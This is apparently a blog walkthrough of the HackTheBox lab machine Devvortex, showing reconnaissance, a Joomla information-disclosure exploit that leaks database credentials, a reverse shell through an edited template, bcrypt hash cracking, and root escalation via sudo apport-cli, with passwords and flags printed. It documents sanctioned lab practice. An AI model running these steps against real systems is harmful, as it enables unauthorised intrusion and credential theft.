Try   HackMD

Devvortex Walkthrough (HTB)

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Hello folks, I'm Abzee a n00b trying to be the best one day. I decided to kick-start 2024 by rooting Devvortex on HackTheBox platform and it was really fun to play with and learnt a few things.

Enumeration

Let start with a simple nmap scan to check all open ports on the given IP with this simple command.

┌──(abzee__Saminu)-[~/Documents/HTB/Devvotex]
└─$ nmap -sC -sV --min-rate 2000 -oA nmap 10.10.11.242
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-01 17:48 WAT
Nmap scan report for devvortex.htb (10.10.11.242)
Host is up (0.67s latency).
Not shown: 722 filtered tcp ports (no-response), 277 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.06 seconds

We have two open port which is HTTP and SSH. Let see what we have on port 80 and get to the juicy part.

┌──(abzee__Saminu)-[~/Documents/HTB/Devvotex]
└─$ http 10.10.11.242
HTTP/1.1 302 Moved Temporarily
Connection: keep-alive
Content-Length: 154
Content-Type: text/html
Date: Mon, 01 Jan 2024 16:33:10 GMT
Location: http://devvortex.htb/
Server: nginx/1.18.0 (Ubuntu)

<html>
<head><title>302 Found</title></head>
<body>
<center><h1>302 Found</h1></center>
<hr><center>nginx/1.18.0 (Ubuntu)</center>
</body>
</html>

We have a domain in which we have to add to our host to access the webpage.

sudo gedit /etc/hosts

Now we are good to go, They shouldn't be any prob accessing the webpage since what we need as already been added.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

A nice webpage to dive into but unfortunately couldn't get anything from it then I move on to scan for subdomain using FFUF.

┌──(abzee㉿Saminu)-[~/Documents/HTB/Devvotex]
└─$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.devvortex.htb" -u http://devvortex.htb -fs 154

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://devvortex.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.devvortex.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 154
________________________________________________

dev                     [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 1882ms]

ohh nice, with this we can surely get one two things to exploit and get a foothole but first of let visit the subdomain we just got from our scan.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

It running JOOMLA CMS which is vulnerable to Unauthenticated information disclosure (CVE-2023-23752).

Link to exploit: https://www.exploit-db.com/exploits/51334
┌──(abzee㉿Saminu)-[~/Documents/HTB/Devvotex]
└─$ ruby exploit.rb http://dev.devvortex.htb
Users
[649] lewis (lewis) - lewis@devvortex.htb - Super Users
[650] logan paul (logan) - logan@devvortex.htb - Registered

Site info
Site name: Development
Editor: tinymce
Captcha: 0
Access: 1
Debug status: false

Database info
DB type: mysqli
DB host: localhost
DB user: lewis
DB password: P4ntherg0t1n5r3c0n##
DB name: joomla
DB prefix: sd4fg_
DB encryption 0

Boom!! having some juicy user and pass it cool, Time to test them out by visiting the administrator login page.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

And we are in by trying this credentials.

User:lewis
Pass:P4ntherg0t1n5r3c0n##

Foothold

Since we are in we can proceed by selecting system then under site templates there should should be a template that we can edit.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

The index.php can't be edited because of the permission given to it then I decided to edit the offline.php instead by replacing it with my php shell payload then saved it and start my listener. After then by accessing http://dev.devvortex.htb/templates/cassiopeia/offline.php and boom we receive a connection back.

┌──(abzee㉿Saminu)-[~/Documents/HTB/Devvotex]
└─$ rlwrap nc -nvlp 1337                    
listening on [any] 1337 ...
connect to [10.10.14.124] from (UNKNOWN) [10.10.11.242] 40618
Linux devvortex 5.4.0-167-generic #184-Ubuntu SMP Tue Oct 31 09:21:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
 17:43:46 up 24 min,  1 user,  load average: 2.49, 0.87, 0.51
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
logan    pts/1    10.10.14.105     17:34    1:09   2:23   1:07  dd if=/dev/zero of=/dev/null
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@devvortex:/$ 
zsh: suspended  rlwrap nc -nvlp 1337
                                                                                                                                                                                                                                              
┌──(abzee㉿Saminu)-[~/Documents/HTB/Devvotex]
└─$ stty raw -echo;fg     
[1]  + continued  rlwrap nc -nvlp 1337
www-data@devvortex:/$ stty rows 21 cols 120
stty rows 21 cols 120
www-data@devvortex:/$ export TERM=xterm-256color
export TERM=xterm-256color
www-data@devvortex:/$ 

Got in as www-data but not a problem. Time to read the content of user.txt

www-data@devvortex:/$ cd /home
cd /home
www-data@devvortex:/home$ ls -la
ls -la
total 12
drwxr-xr-x  3 root  root  4096 Sep 26 19:16 .
drwxr-xr-x 19 root  root  4096 Oct 26 15:12 ..
drwxr-xr-x  3 logan logan 4096 Jan  1 17:48 logan
www-data@devvortex:/home$ cd logan
cd logan
www-data@devvortex:/home/logan$ ls -la
ls -la
total 32
drwxr-xr-x 3 logan logan 4096 Jan  1 17:48 .
drwxr-xr-x 3 root  root  4096 Sep 26 19:16 ..
lrwxrwxrwx 1 root  root     9 Oct 26 14:58 .bash_history -> /dev/null
-rw-r--r-- 1 logan logan  220 Sep 26 19:16 .bash_logout
-rw-r--r-- 1 logan logan 3771 Sep 26 19:16 .bashrc
drwx------ 2 logan logan 4096 Oct 26 15:12 .cache
-rw-r--r-- 1 logan logan  807 Sep 26 19:16 .profile
-rw-rw-r-- 1 logan logan  199 Jan  1 17:48 panic.c
-rw-r----- 1 root  logan   33 Jan  1 17:19 user.txt
www-data@devvortex:/home/logan$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
www-data@devvortex:/home/logan$

We don't have permission to read user.txt unless we are user logan so let move around for a possible credential.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Mysql credentials to try out.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

A hash to crack, This is where JohnTheRipper comes in.

┌──(abzee__Saminu)-[~/Documents/HTB/Devvotex]
└─$ hashid hash      
--File 'hash'--
Analyzing '$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12'
[+] Blowfish(OpenBSD) 
[+] Woltlab Burning Board 4.x 
[+] bcrypt 
--End of file 'hash'--                                                                                                                                                                                                                                              
┌──(abzee__Saminu)-[~/Documents/HTB/Devvotex]
└─$ john --wordlist=/opt/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
No password hashes left to crack (see FAQ)
                                                                                                                                                                                                                                              
┌──(abzee__Saminu)-[~/Documents/HTB/Devvotex]
└─$ john --show hash                               
?:tequieromucho

1 password hash cracked, 0 left

John to the rescue and we found ourself a password, let try them on ssh.

User:logan
Pass:tequieromucho

┌──(abzee㉿Saminu)-[~/Documents/HTB/Devvotex]
└─$ ssh logan@10.10.11.242
logan@10.10.11.242's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-167-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 System information disabled due to load higher than 2.0

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Jan  1 18:03:20 2024 from 10.10.14.105
logan@devvortex:~$ ls
panic.c  user.txt
logan@devvortex:~$ cat user.txt
099c4620c4cbac6b4423a27f5456eecf
logan@devvortex:~$ whoami
logan
logan@devvortex:~$

Privilege Escalation

The wait is over time to owned system cos that is the sweetest thing ever. First of all let see what we have in sudo -l.

logan@devvortex:~$ sudo -l
[sudo] password for logan: 
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli
logan@devvortex:~$

This vulnerability is privilege escalation in apport-cli 2.26.0 (CVE-2023–1326).

image

Let see how we can use it to gain system.

image

running sudo /usr/bin/apport-cli -f will bring out some options then select 1 after then 3 which will bring another options, this time it not numbers but alphabet so it will be V this time to select after that it !/bin/bash and boom we are system.

Please reproduce the crash and collect a backtrace.  See https://wiki.ubuntu.com/X/Backtracing for directions.

Press any key to continue... 

..dpkg-query: no packages found matching xorg
....................

*** Send problem report to the developers?

After the problem report has been sent, please fill out the form in the
automatically opened web browser.

What would you like to do? Your options are:
  S: Send report (1.5 KB)
  V: View report
  K: Keep report file for sending later or copying to somewhere else
  I: Cancel and ignore future crashes of this program version
  C: Cancel
Please choose (S/V/K/I/C): V
root@devvortex:/home/logan# whoami
root
root@devvortex:/home/logan# cat /root/root.txt;hostname
ad22b7bb92bc869a4feb2511ed328110
devvortex
root@devvortex:/home/logan#

This is all for today and thanks for reading.